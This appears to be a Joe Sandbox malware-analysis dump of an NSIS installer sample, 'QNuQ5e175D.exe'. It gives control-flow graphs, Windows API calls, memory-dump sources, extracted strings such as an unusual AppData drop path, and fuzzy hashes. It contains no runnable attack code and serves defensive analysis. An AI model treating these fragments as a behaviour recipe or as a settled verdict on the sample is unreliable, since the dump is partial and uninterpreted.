                                                          control_flow_graph 383 4030a2-4030f0 GetTickCount GetModuleFileNameW call 406067 386 4030f2-4030f7 383->386 387 4030fc-40312a call 406577 call 405e92 call 406577 GetFileSize 383->387 388 4032d2-4032d6 386->388 395 403130 387->395 396 403215-403223 call 40303e 387->396 398 403135-40314c 395->398 402 403225-403228 396->402 403 403278-40327d 396->403 400 403150-403159 call 4034f4 398->400 401 40314e 398->401 409 40327f-403287 call 40303e 400->409 410 40315f-403166 400->410 401->400 405 40322a-403242 call 40350a call 4034f4 402->405 406 40324c-403276 GlobalAlloc call 40350a call 4032d9 402->406 403->388 405->403 429 403244-40324a 405->429 406->403 434 403289-40329a 406->434 409->403 414 4031e2-4031e6 410->414 415 403168-40317c call 406022 410->415 419 4031f0-4031f6 414->419 420 4031e8-4031ef call 40303e 414->420 415->419 432 40317e-403185 415->432 425 403205-40320d 419->425 426 4031f8-403202 call 406a58 419->426 420->419 425->398 433 403213 425->433 426->425 429->403 429->406 432->419 438 403187-40318e 432->438 433->396 435 4032a2-4032a7 434->435 436 40329c 434->436 439 4032a8-4032ae 435->439 436->435 438->419 440 403190-403197 438->440 439->439 441 4032b0-4032cb SetFilePointer call 406022 439->441 440->419 442 403199-4031a0 440->442 446 4032d0 441->446 442->419 443 4031a2-4031c2 442->443 443->403 445 4031c8-4031cc 443->445 447 4031d4-4031dc 445->447 448 4031ce-4031d2 445->448 446->388 447->419 449 4031de-4031e0 447->449 448->433 448->447 449->419
                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 004030B3
                                                          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\QNuQ5e175D.exe,00000400), ref: 004030CF
                                                            • Part of subcall function 00406067: GetFileAttributesW.KERNELBASE(00000003,004030E2,C:\Users\user\Desktop\QNuQ5e175D.exe,80000000,00000003), ref: 0040606B
                                                            • Part of subcall function 00406067: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040608D
                                                          • GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\QNuQ5e175D.exe,C:\Users\user\Desktop\QNuQ5e175D.exe,80000000,00000003), ref: 0040311B
                                                          • GlobalAlloc.KERNELBASE(00000040,?), ref: 00403251
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                          • String ID: "C:\Users\user\Desktop\QNuQ5e175D.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\QNuQ5e175D.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                          • API String ID: 2803837635-3729504802
                                                          • Opcode ID: 4024c06592b314d40f0961ad518ac7c722ea73bb9c6d843fd25d11ff0f4bc292
                                                          • Instruction ID: 55eb758a8cc994b5b8f5e8324c308f37a69edd03a8198e206d37cac48cd63750
                                                          • Opcode Fuzzy Hash: 4024c06592b314d40f0961ad518ac7c722ea73bb9c6d843fd25d11ff0f4bc292
                                                          • Instruction Fuzzy Hash: E9519171900204AFDB209FA5DD86B9E7EACEB09356F20417BF504B62D1C7789F408BAD

Control-flow Graph (legend: Executed / Not Executed)
                                                          control_flow_graph 735 4065b4-4065bd 736 4065d0-4065ea 735->736 737 4065bf-4065ce 735->737 738 4065f0-4065fc 736->738 739 4067fa-406800 736->739 737->736 738->739 740 406602-406609 738->740 741 406806-406813 739->741 742 40660e-40661b 739->742 740->739 744 406815-40681a call 406577 741->744 745 40681f-406822 741->745 742->741 743 406621-40662a 742->743 746 406630-406673 743->746 747 4067e7 743->747 744->745 751 406679-406685 746->751 752 40678b-40678f 746->752 749 4067f5-4067f8 747->749 750 4067e9-4067f3 747->750 749->739 750->739 753 406687 751->753 754 40668f-406691 751->754 755 406791-406798 752->755 756 4067c3-4067c7 752->756 753->754 761 406693-4066b1 call 406445 754->761 762 4066cb-4066ce 754->762 759 4067a8-4067b4 call 406577 755->759 760 40679a-4067a6 call 4064be 755->760 757 4067d7-4067e5 lstrlenW 756->757 758 4067c9-4067d2 call 4065b4 756->758 757->739 758->757 774 4067b9-4067bf 759->774 760->774 773 4066b6-4066b9 761->773 763 4066d0-4066dc GetSystemDirectoryW 762->763 764 4066e1-4066e4 762->764 769 40676e-406771 763->769 770 4066f6-4066fa 764->770 771 4066e6-4066f2 GetWindowsDirectoryW 764->771 775 406783-406789 call 406825 769->775 776 406773-406776 769->776 770->769 777 4066fc-40671a 770->777 771->770 773->776 778 4066bf-4066c6 call 4065b4 773->778 774->757 779 4067c1 774->779 775->757 776->775 780 406778-40677e lstrcatW 776->780 782 40671c-406722 777->782 783 40672e-406746 call 40696b 777->783 778->769 779->775 780->775 788 40672a-40672c 782->788 792 406748-40675b SHGetPathFromIDListW CoTaskMemFree 783->792 793 40675d-406766 783->793 788->783 790 406768-40676c 788->790 790->769 792->790 792->793 793->777 793->790
                                                          APIs
                                                          • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004066D6
                                                          • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp\System.dll,?,?,00000000,00000000,00425A20,74DF23A0), ref: 004066EC
                                                          • SHGetPathFromIDListW.SHELL32(00000000,Call), ref: 0040674A
                                                          • CoTaskMemFree.OLE32(00000000,?,00000000,00000007), ref: 00406753
                                                          • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp\System.dll,?,?,00000000,00000000,00425A20,74DF23A0), ref: 0040677E
                                                          • lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp\System.dll,?,?,00000000,00000000,00425A20,74DF23A0), ref: 004067D8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
                                                          • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                          • API String ID: 4024019347-2806867668
                                                          • Opcode ID: 2066e1c471d7490a15c1c198898eb18b068b97d6eda6cad4e7272ae8e9db0920
                                                          • Instruction ID: fc4c1bf1ff31ba1b34cdfc75387d7881e57296f2874843d1a5ebc397bafcf832
                                                          • Opcode Fuzzy Hash: 2066e1c471d7490a15c1c198898eb18b068b97d6eda6cad4e7272ae8e9db0920
                                                          • Instruction Fuzzy Hash: D16135716042009BD720AF24DD80B6B76E8EF85328F12453FF647B32D0DB7D9961865E

Control-flow Graph (legend: Executed / Not Executed)
                                                          control_flow_graph 794 4032d9-4032f0 795 4032f2 794->795 796 4032f9-403302 794->796 795->796 797 403304 796->797 798 40330b-403310 796->798 797->798 799 403320-40332d call 4034f4 798->799 800 403312-40331b call 40350a 798->800 804 4034e2 799->804 805 403333-403337 799->805 800->799 806 4034e4-4034e5 804->806 807 40348d-40348f 805->807 808 40333d-403386 GetTickCount 805->808 809 4034ed-4034f1 806->809 812 403491-403494 807->812 813 4034cf-4034d2 807->813 810 4034ea 808->810 811 40338c-403394 808->811 810->809 815 403396 811->815 816 403399-4033a7 call 4034f4 811->816 812->810 814 403496 812->814 817 4034d4 813->817 818 4034d7-4034e0 call 4034f4 813->818 819 403499-40349f 814->819 815->816 816->804 828 4033ad-4033b6 816->828 817->818 818->804 826 4034e7 818->826 822 4034a1 819->822 823 4034a3-4034b1 call 4034f4 819->823 822->823 823->804 831 4034b3-4034bf call 406119 823->831 826->810 830 4033bc-4033dc call 406ac6 828->830 836 4033e2-4033f5 GetTickCount 830->836 837 403485-403487 830->837 838 4034c1-4034cb 831->838 839 403489-40348b 831->839 840 403440-403442 836->840 841 4033f7-4033ff 836->841 837->806 838->819 844 4034cd 838->844 839->806 842 403444-403448 840->842 843 403479-40347d 840->843 845 403401-403405 841->845 846 403407-403438 MulDiv wsprintfW call 4055fc 841->846 847 40344a-403451 call 406119 842->847 848 40345f-40346a 842->848 843->811 849 403483 843->849 844->810 845->840 845->846 851 40343d 846->851 854 403456-403458 847->854 853 40346d-403471 848->853 849->810 851->840 853->830 855 403477 853->855 854->839 856 40345a-40345d 854->856 855->810 856->853
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: CountTick$wsprintf
                                                          • String ID: *B$ ZB$ A$ A$... %d%%
                                                          • API String ID: 551687249-3856725213
                                                          • Opcode ID: 4d79547acdf73e44e2915cc23a34bb29038fe19ea0f8e502eb24a445e2a4333a
                                                          • Instruction ID: 3a086bfa1ae904988031f2e91e2ff9394e13111a018eeb379290de00703e2b75
                                                          • Opcode Fuzzy Hash: 4d79547acdf73e44e2915cc23a34bb29038fe19ea0f8e502eb24a445e2a4333a
                                                          • Instruction Fuzzy Hash: 2F519F71900219DBCB11DF65DA44B9E7FB8AF44766F10413BE810BB2D1C7789A40CBA9

Control-flow Graph (legend: Executed / Not Executed)
                                                          control_flow_graph 857 401794-4017b9 call 402dcb call 405ebd 862 4017c3-4017d5 call 406577 call 405e46 lstrcatW 857->862 863 4017bb-4017c1 call 406577 857->863 868 4017da-4017db call 406825 862->868 863->868 872 4017e0-4017e4 868->872 873 4017e6-4017f0 call 4068d4 872->873 874 401817-40181a 872->874 881 401802-401814 873->881 882 4017f2-401800 CompareFileTime 873->882 876 401822-40183e call 406067 874->876 877 40181c-40181d call 406042 874->877 884 401840-401843 876->884 885 4018b2-4018db call 4055fc call 4032d9 876->885 877->876 881->874 882->881 887 401894-40189e call 4055fc 884->887 888 401845-401883 call 406577 * 2 call 4065b4 call 406577 call 405bd7 884->888 898 4018e3-4018ef SetFileTime 885->898 899 4018dd-4018e1 885->899 900 4018a7-4018ad 887->900 888->872 921 401889-40188a 888->921 902 4018f5-401900 CloseHandle 898->902 899->898 899->902 903 402c58 900->903 905 401906-401909 902->905 906 402c4f-402c52 902->906 907 402c5a-402c5e 903->907 909 40190b-40191c call 4065b4 lstrcatW 905->909 910 40191e-401921 call 4065b4 905->910 906->903 916 401926-4023bd 909->916 910->916 919 4023c2-4023c7 916->919 920 4023bd call 405bd7 916->920 919->907 920->919 921->900 922 40188c-40188d 921->922 922->887
                                                          APIs
                                                          • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\skattekode\Rygtets222\overstadigeres,?,?,00000031), ref: 004017D5
                                                          • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\skattekode\Rygtets222\overstadigeres,?,?,00000031), ref: 004017FA
                                                            • Part of subcall function 00406577: lstrcpynW.KERNEL32(?,?,00000400,004036C4,00433700,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406584
                                                            • Part of subcall function 004055FC: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp\System.dll,00000000,00425A20,74DF23A0,?,?,?,?,?,?,?,?,?,0040343D,00000000,?), ref: 00405634
                                                            • Part of subcall function 004055FC: lstrlenW.KERNEL32(0040343D,Skipped: C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp\System.dll,00000000,00425A20,74DF23A0,?,?,?,?,?,?,?,?,?,0040343D,00000000), ref: 00405644
                                                            • Part of subcall function 004055FC: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp\System.dll,0040343D,0040343D,Skipped: C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp\System.dll,00000000,00425A20,74DF23A0), ref: 00405657
                                                            • Part of subcall function 004055FC: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp\System.dll), ref: 00405669
                                                            • Part of subcall function 004055FC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040568F
                                                            • Part of subcall function 004055FC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004056A9
                                                            • Part of subcall function 004055FC: SendMessageW.USER32(?,00001013,?,00000000), ref: 004056B7
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                          • String ID: C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp$C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp\System.dll$C:\Users\user\AppData\Local\skattekode\Rygtets222\overstadigeres$Call
                                                          • API String ID: 1941528284-3388506212
                                                          • Opcode ID: 92f8b93885e00e2238c8143a7be30e505a2fe7597e0250fcbd3cd8e0f990a4c4
                                                          • Instruction ID: 896c0c78208a39cbb5dd39340d0745d1a2bf2ace5f7797069eceb710e9101d93
                                                          • Opcode Fuzzy Hash: 92f8b93885e00e2238c8143a7be30e505a2fe7597e0250fcbd3cd8e0f990a4c4
                                                          • Instruction Fuzzy Hash: 4C41B671900108BACB117BB5DD85DBE7AB9EF45328F21423FF412B10E2D73C8A919A2D

Control-flow Graph (legend: Executed / Not Executed)
                                                          control_flow_graph 923 4055fc-405611 924 405617-405628 923->924 925 4056c8-4056cc 923->925 926 405633-40563f lstrlenW 924->926 927 40562a-40562e call 4065b4 924->927 929 405641-405651 lstrlenW 926->929 930 40565c-405660 926->930 927->926 929->925 931 405653-405657 lstrcatW 929->931 932 405662-405669 SetWindowTextW 930->932 933 40566f-405673 930->933 931->930 932->933 934 405675-4056b7 SendMessageW * 3 933->934 935 4056b9-4056bb 933->935 934->935 935->925 936 4056bd-4056c0 935->936 936->925
                                                          APIs
                                                          • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp\System.dll,00000000,00425A20,74DF23A0,?,?,?,?,?,?,?,?,?,0040343D,00000000,?), ref: 00405634
                                                          • lstrlenW.KERNEL32(0040343D,Skipped: C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp\System.dll,00000000,00425A20,74DF23A0,?,?,?,?,?,?,?,?,?,0040343D,00000000), ref: 00405644
                                                          • lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp\System.dll,0040343D,0040343D,Skipped: C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp\System.dll,00000000,00425A20,74DF23A0), ref: 00405657
                                                          • SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp\System.dll), ref: 00405669
                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040568F
                                                          • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004056A9
                                                          • SendMessageW.USER32(?,00001013,?,00000000), ref: 004056B7
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                          • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp\System.dll
                                                          • API String ID: 2531174081-1249951325
                                                          • Opcode ID: 7a9b63bfacfea3e7ee08c26d0c930c27eafc8712a75251909ef17a9a102c325c
                                                          • Instruction ID: 60923f6e922cea494a698f26c75bee70e53a21f42b4b77269416c2a585f1ce57
                                                          • Opcode Fuzzy Hash: 7a9b63bfacfea3e7ee08c26d0c930c27eafc8712a75251909ef17a9a102c325c
                                                          • Instruction Fuzzy Hash: 9A21A171900258BACB119FA5ED449DFBFB4EF45310F50843AF908B22A0C3794A40CFA8

Control-flow Graph (legend: Executed / Not Executed)
                                                          control_flow_graph 937 402711-40272a call 402da9 940 402730-402737 937->940 941 402c4f-402c52 937->941 943 402739 940->943 944 40273c-40273f 940->944 942 402c58-402c5e 941->942 943->944 945 4028a3-4028ab 944->945 946 402745-402754 call 4064d7 944->946 945->941 946->945 950 40275a 946->950 951 402760-402764 950->951 952 4027f9-4027fc 951->952 953 40276a-402785 ReadFile 951->953 955 402814-402824 call 4060ea 952->955 956 4027fe-402801 952->956 953->945 954 40278b-402790 953->954 954->945 958 402796-4027a4 954->958 955->945 965 402826 955->965 956->955 959 402803-40280e call 406148 956->959 962 4027aa-4027bc MultiByteToWideChar 958->962 963 40285f-40286b call 4064be 958->963 959->945 959->955 962->965 966 4027be-4027c1 962->966 963->942 968 402829-40282c 965->968 969 4027c3-4027ce 966->969 968->963 971 40282e-402833 968->971 969->968 972 4027d0-4027f5 SetFilePointer MultiByteToWideChar 969->972 973 402870-402874 971->973 974 402835-40283a 971->974 972->969 975 4027f7 972->975 976 402891-40289d SetFilePointer 973->976 977 402876-40287a 973->977 974->973 978 40283c-40284f 974->978 975->965 976->945 979 402882-40288f 977->979 980 40287c-402880 977->980 978->945 981 402851-402857 978->981 979->945 980->976 980->979 981->951 982 40285d 981->982 982->945
                                                          APIs
                                                          • ReadFile.KERNELBASE(?,?,?,?), ref: 0040277D
                                                          • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004027B8
                                                          • SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027DB
                                                          • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027F1
                                                            • Part of subcall function 00406148: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 0040615E
                                                          • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040289D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: File$Pointer$ByteCharMultiWide$Read
                                                          • String ID: 9
                                                          • API String ID: 163830602-2366072709
                                                          • Opcode ID: e6852b5c5fbfd8bc876860f3b14f1bcaed0b753dd9a04d4db6e12186382bd870
                                                          • Instruction ID: d1aefac9689752b6b3ea6a4f87dd4281ecbe68d6f3974aa7f4e2ef829afcd0bd
                                                          • Opcode Fuzzy Hash: e6852b5c5fbfd8bc876860f3b14f1bcaed0b753dd9a04d4db6e12186382bd870
                                                          • Instruction Fuzzy Hash: 66510C75D04119AADF20EFD4CA85AAEBBB9FF44304F14817BE501B62D0D7B89D828B58

                                                          Control-flow Graph

                                                          control_flow_graph 983 4068fb-40691b GetSystemDirectoryW 984 40691d 983->984 985 40691f-406921 983->985 984->985 986 406932-406934 985->986 987 406923-40692c 985->987 989 406935-406968 wsprintfW LoadLibraryExW 986->989 987->986 988 40692e-406930 987->988 988->989
                                                          APIs
                                                          • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406912
                                                          • wsprintfW.USER32 ref: 0040694D
                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406961
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: DirectoryLibraryLoadSystemwsprintf
                                                          • String ID: %s%S.dll$UXTHEME
                                                          • API String ID: 2200240437-1106614640
                                                          • Opcode ID: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                                                          • Instruction ID: 6d7bab0cfc2d48cbbbe6bb2f91b005b1c0391479526b60628745523d5c0137a7
                                                          • Opcode Fuzzy Hash: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                                                          • Instruction Fuzzy Hash: 66F02B71501129A7CF10AB68DD0EF9F376CAB00304F10447AA646F10E0EB7CDB69CB98

                                                          Control-flow Graph

                                                          control_flow_graph 990 402ece-402ef7 call 4063e4 992 402efc-402f00 990->992 993 402fb1-402fb5 992->993 994 402f06-402f0a 992->994 995 402f0c-402f2d RegEnumValueW 994->995 996 402f2f-402f42 994->996 995->996 997 402f96-402fa4 RegCloseKey 995->997 998 402f6b-402f72 RegEnumKeyW 996->998 997->993 999 402f44-402f46 998->999 1000 402f74-402f86 RegCloseKey call 40696b 998->1000 999->997 1002 402f48-402f5c call 402ece 999->1002 1006 402fa6-402fac 1000->1006 1007 402f88-402f94 RegDeleteKeyW 1000->1007 1002->1000 1008 402f5e-402f6a 1002->1008 1006->993 1007->993 1008->998
                                                          APIs
                                                          • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402F22
                                                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F6E
                                                          • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F77
                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F8E
                                                          • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F99
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: CloseEnum$DeleteValue
                                                          • String ID:
                                                          • API String ID: 1354259210-0
                                                          • Opcode ID: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
